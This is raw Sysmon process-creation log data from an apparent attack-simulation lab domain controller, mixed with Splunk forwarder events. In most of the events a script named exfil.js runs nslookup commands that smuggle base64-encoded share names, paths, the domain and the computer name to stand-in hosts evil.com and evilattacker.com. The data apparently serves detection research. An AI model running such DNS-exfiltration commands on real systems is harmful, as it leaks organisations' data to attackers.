2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070592Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:53.434{A8622C2F-5A4D-6078-BD0E-00000000AE01}6516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A4D-6078-BB0E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzliy.tmp 2>&1 154100x800000000000000070581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:53.405{A8622C2F-5A4D-6078-BB0E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzliy.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:35.856{A8622C2F-5A3B-6078-BA0E-00000000AE01}4256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A3B-6078-B80E-00000000AE01}5756C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdymc.tmp 2>&1 154100x800000000000000070501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:35.827{A8622C2F-5A3B-6078-B80E-00000000AE01}5756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdymc.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:33.473{A8622C2F-5A39-6078-B70E-00000000AE01}7016C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A39-6078-B50E-00000000AE01}6432C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlipwbc.tmp 2>&1 154100x800000000000000070467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:33.442{A8622C2F-5A39-6078-B50E-00000000AE01}6432C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlipwbc.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:31.449{A8622C2F-5A37-6078-B40E-00000000AE01}3220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A37-6078-B20E-00000000AE01}5368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqaetol.tmp 2>&1 154100x800000000000000070426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:31.417{A8622C2F-5A37-6078-B20E-00000000AE01}5368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqaetol.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:23.351{A8622C2F-5A2F-6078-B10E-00000000AE01}6824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A2F-6078-AF0E-00000000AE01}1536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgx.tmp 2>&1 154100x800000000000000070358Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:23.321{A8622C2F-5A2F-6078-AF0E-00000000AE01}1536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgx.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:22.341{A8622C2F-5A2E-6078-AE0E-00000000AE01}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070331Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:20.599{A8622C2F-5A2C-6078-AD0E-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:22:19.932{A8622C2F-5A2B-6078-AC0E-00000000AE01}2584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:19.266{A8622C2F-5A2B-6078-AB0E-00000000AE01}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:17.502{A8622C2F-5A29-6078-AA0E-00000000AE01}4164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:16.836{A8622C2F-5A28-6078-A90E-00000000AE01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:16.169{A8622C2F-5A28-6078-A80E-00000000AE01}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000070228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:05.779{A8622C2F-5A1D-6078-A70E-00000000AE01}728C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A1D-6078-A50E-00000000AE01}1736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeikeci.tmp 2>&1 154100x800000000000000070217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:05.750{A8622C2F-5A1D-6078-A50E-00000000AE01}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeikeci.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:01.907{A8622C2F-5A19-6078-A40E-00000000AE01}5420C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe 
-timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A19-6078-A20E-00000000AE01}5864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqsswr.tmp 2>&1 154100x800000000000000070181Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:01.875{A8622C2F-5A19-6078-A20E-00000000AE01}5864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqsswr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070154Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:59.545{A8622C2F-5A17-6078-A10E-00000000AE01}3868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A17-6078-9F0E-00000000AE01}4856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbbmco.tmp 2>&1 154100x800000000000000070143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:59.512{A8622C2F-5A17-6078-9F0E-00000000AE01}4856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbbmco.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070101Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:53.227{A8622C2F-5A11-6078-9E0E-00000000AE01}1476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A11-6078-9C0E-00000000AE01}5052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnrms.tmp 2>&1 154100x800000000000000070090Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:53.198{A8622C2F-5A11-6078-9C0E-00000000AE01}5052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnrms.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:35.674{A8622C2F-59FF-6078-9B0E-00000000AE01}5952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59FF-6078-990E-00000000AE01}6852C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqd.tmp 2>&1 154100x800000000000000069973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:35.646{A8622C2F-59FF-6078-990E-00000000AE01}6852C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqd.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069926Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:23.137{A8622C2F-59F3-6078-980E-00000000AE01}4256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59F3-6078-960E-00000000AE01}5620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeae.tmp 2>&1 154100x800000000000000069915Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:23.108{A8622C2F-59F3-6078-960E-00000000AE01}5620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeae.tmp 